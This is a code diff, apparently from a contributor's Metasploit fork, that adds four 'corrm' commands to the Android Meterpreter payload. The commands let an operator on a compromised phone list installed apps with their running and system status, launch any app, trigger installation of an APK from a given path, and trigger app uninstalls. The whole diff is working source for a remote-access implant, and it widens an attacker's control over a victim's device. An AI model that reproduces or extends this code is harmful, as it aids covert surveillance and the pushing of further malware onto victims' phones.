Android App Controller

for this metasploit commits
ae07e611a7

d3e83d4557

java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java

@@ -137,6 +137,12 @@ public class AndroidMeterpreter extends Meterpreter {
         mgr.registerCommand("stdapi_sys_process_get_processes", stdapi_sys_process_get_processes_android.class);
         mgr.registerCommand("stdapi_ui_desktop_screenshot", stdapi_ui_desktop_screenshot.class);
         if (context != null) {
+            // CorrM
+            mgr.registerCommand("corrm_app_list", corrm_app_list.class);
+            mgr.registerCommand("corrm_app_run", corrm_app_run.class);
+            mgr.registerCommand("corrm_app_install", corrm_app_install.class);
+            mgr.registerCommand("corrm_app_uninstall", corrm_app_uninstall.class);
+            // CorrM
             mgr.registerCommand("webcam_audio_record", webcam_audio_record_android.class);
             mgr.registerCommand("webcam_list", webcam_list_android.class);
             mgr.registerCommand("webcam_start", webcam_start_android.class);

java/androidpayload/library/src/com/metasploit/meterpreter/android/corrm_app_install.java

@@ -0,0 +1,45 @@
+package com.metasploit.meterpreter.android;
+
+import android.content.Context;
+import android.os.PowerManager;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Bundle;
+
+import java.util.List;
+import java.io.File;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public class corrm_app_install implements Command {
+    private static final int TLV_EXTENSIONS                = 20000;
+    private static final int TLV_TYPE_APP_APK_PATH         = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2914);
+    private static final int TLV_TYPE_APP_INSTALL_ENUM     = TLVPacket.TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 2915);
+    final Context context = AndroidMeterpreter.getContext();
+
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String apkpath = request.getStringValue(TLV_TYPE_APP_APK_PATH);
+
+        File file = new File(apkpath);
+        if(!file.exists())
+        {
+            response.addOverflow(TLV_TYPE_APP_INSTALL_ENUM, 2); // File Not Found
+            return ERROR_SUCCESS;
+        }
+
+        Intent intent = new Intent(Intent.ACTION_VIEW);
+        intent.setDataAndType(Uri.fromFile(new File(apkpath)), "application/vnd.android.package-archive");
+        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+        context.startActivity(intent);
+
+        response.addOverflow(TLV_TYPE_APP_INSTALL_ENUM, 1); // Good
+        return ERROR_SUCCESS;
+    }
+}

java/androidpayload/library/src/com/metasploit/meterpreter/android/corrm_app_list.java

@@ -0,0 +1,127 @@
+package com.metasploit.meterpreter.android;
+
+import android.content.Context;
+import android.os.PowerManager;
+
+import android.app.Activity;
+import android.app.ActivityManager;
+import android.content.Context;
+import android.content.pm.ApplicationInfo;
+import android.content.pm.PackageInfo;
+import android.content.pm.PackageManager;
+import android.os.Bundle;
+import android.util.Log;
+import android.widget.Toast;
+
+import java.util.List;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public class corrm_app_list implements Command {
+    private static final int TLV_EXTENSIONS         = 20000;
+    private static final int TLV_TYPE_APPS_LIST     = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2911);
+    private static final int TLV_TYPE_APPS_LIST_OPT = TLVPacket.TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 2912);
+    final Context context = AndroidMeterpreter.getContext();
+
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        int opt = request.getIntValue(TLV_TYPE_APPS_LIST_OPT);
+
+        final PackageManager pm = context.getPackageManager();
+        List<ApplicationInfo> packages = pm.getInstalledApplications(PackageManager.GET_META_DATA);
+
+
+        switch (opt)
+        {
+            case 0:
+                // Get All Apps
+
+                for (ApplicationInfo packageInfo : packages) {
+                    response.addOverflow(TLV_TYPE_APPS_LIST, packageInfo.packageName); // PackageName
+                    response.addOverflow(TLV_TYPE_APPS_LIST, pm.getApplicationLabel(packageInfo)); // App Name
+                    response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(isAppRunning(context, packageInfo.packageName))); // Running?
+                    response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(isSystem(context, packageInfo.packageName))); // System?
+                }
+
+                break;
+            case 1:
+                // Get User apps ONLY
+                for (ApplicationInfo packageInfo : packages) {
+                    if (!isSystem(context, packageInfo.packageName)) {
+                        response.addOverflow(TLV_TYPE_APPS_LIST, packageInfo.packageName); // PackageName
+                        response.addOverflow(TLV_TYPE_APPS_LIST, pm.getApplicationLabel(packageInfo)); // App Name
+                        response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(isAppRunning(context, packageInfo.packageName))); // Running?
+                        response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(false)); // System?
+                    }
+                }
+
+                break;
+            case 2:
+                // Get System apps ONLY"
+                for (ApplicationInfo packageInfo : packages) {
+                    if (isSystem(context, packageInfo.packageName)) {
+                        response.addOverflow(TLV_TYPE_APPS_LIST, packageInfo.packageName); // PackageName
+                        response.addOverflow(TLV_TYPE_APPS_LIST, pm.getApplicationLabel(packageInfo)); // App Name
+                        response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(isAppRunning(context, packageInfo.packageName))); // Running?
+                        response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(true)); // System?
+                    }
+                }
+
+                break;
+        }
+
+        // return ERROR_FAILURE;
+        return ERROR_SUCCESS;
+    }
+
+    private boolean AppRun(final Context context, final String packageName) {
+        return isActivtyRunning(context, packageName) && isAppRunning(context, packageName);
+    }
+
+    private boolean isActivtyRunning(final Context context, final String packageName) {
+        final ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);
+        final List<ActivityManager.RunningTaskInfo> procInfos = activityManager.getRunningTasks(Integer.MAX_VALUE);
+        if (procInfos != null)
+        {
+            for (ActivityManager.RunningTaskInfo task : procInfos) {
+                if (context.getPackageName().equalsIgnoreCase(task.baseActivity.getPackageName()))
+                    return true;
+            }
+        }
+        return false;
+    }
+
+    private boolean isAppRunning(final Context context, final String packageName) {
+        final ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);
+        final List<ActivityManager.RunningAppProcessInfo> procInfos = activityManager.getRunningAppProcesses();
+        if (procInfos != null)
+        {
+            for (final ActivityManager.RunningAppProcessInfo processInfo : procInfos) {
+                if (processInfo.processName.equalsIgnoreCase(packageName)) {
+                    return true;
+                }
+            }
+        }
+        return false;
+    }
+
+    private boolean isSystem(final Context context, final String packageName) {
+        PackageManager pm = context.getPackageManager();
+
+        ApplicationInfo ai;
+        try {
+            ai = pm.getApplicationInfo(packageName, 0);
+            if ((ai.flags & ApplicationInfo.FLAG_SYSTEM) != 0) {
+                return true;
+            }
+        } catch (PackageManager.NameNotFoundException e) {
+            e.printStackTrace();
+        }
+
+        return false;
+    }
+}

java/androidpayload/library/src/com/metasploit/meterpreter/android/corrm_app_run.java

@@ -0,0 +1,43 @@
+package com.metasploit.meterpreter.android;
+
+import android.content.Context;
+import android.os.PowerManager;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+
+import java.util.List;
+import java.io.File;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public class corrm_app_run implements Command {
+    private static final int TLV_EXTENSIONS                = 20000;
+    private static final int TLV_TYPE_APP_PACKAGE_NAME     = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2913);
+    private static final int TLV_TYPE_APP_RUN_ENUM         = TLVPacket.TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 2916);
+    final Context context = AndroidMeterpreter.getContext();
+
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String packageName = request.getStringValue(TLV_TYPE_APP_PACKAGE_NAME);
+
+        try {
+            Intent intent = context.getPackageManager().getLaunchIntentForPackage(packageName);
+            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+            context.startActivity(intent);
+
+        } catch (java.lang.RuntimeException ex) {
+            response.addOverflow(TLV_TYPE_APP_RUN_ENUM, 2); // Not Found Package Name
+            return ERROR_SUCCESS;
+        }
+
+        response.addOverflow(TLV_TYPE_APP_RUN_ENUM, 1); // Good
+        return ERROR_SUCCESS;
+    }
+}

java/androidpayload/library/src/com/metasploit/meterpreter/android/corrm_app_uninstall.java

@@ -0,0 +1,39 @@
+package com.metasploit.meterpreter.android;
+
+import android.content.Context;
+import android.os.PowerManager;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Bundle;
+
+import java.util.List;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public class corrm_app_uninstall implements Command {
+    private static final int TLV_EXTENSIONS                = 20000;
+    private static final int TLV_TYPE_APP_PACKAGE_NAME     = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2913);
+    final Context context = AndroidMeterpreter.getContext();
+
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        // AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
+        // final Context context = androidMeterpreter.getContext();
+
+        String PackageName = request.getStringValue(TLV_TYPE_APP_PACKAGE_NAME);
+
+        Intent intent = new Intent(Intent.ACTION_DELETE);
+        intent.setData(Uri.parse("package:" + PackageName));
+        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+        context.startActivity(intent);
+
+        // return ERROR_FAILURE;
+        return ERROR_SUCCESS;
+    }
+}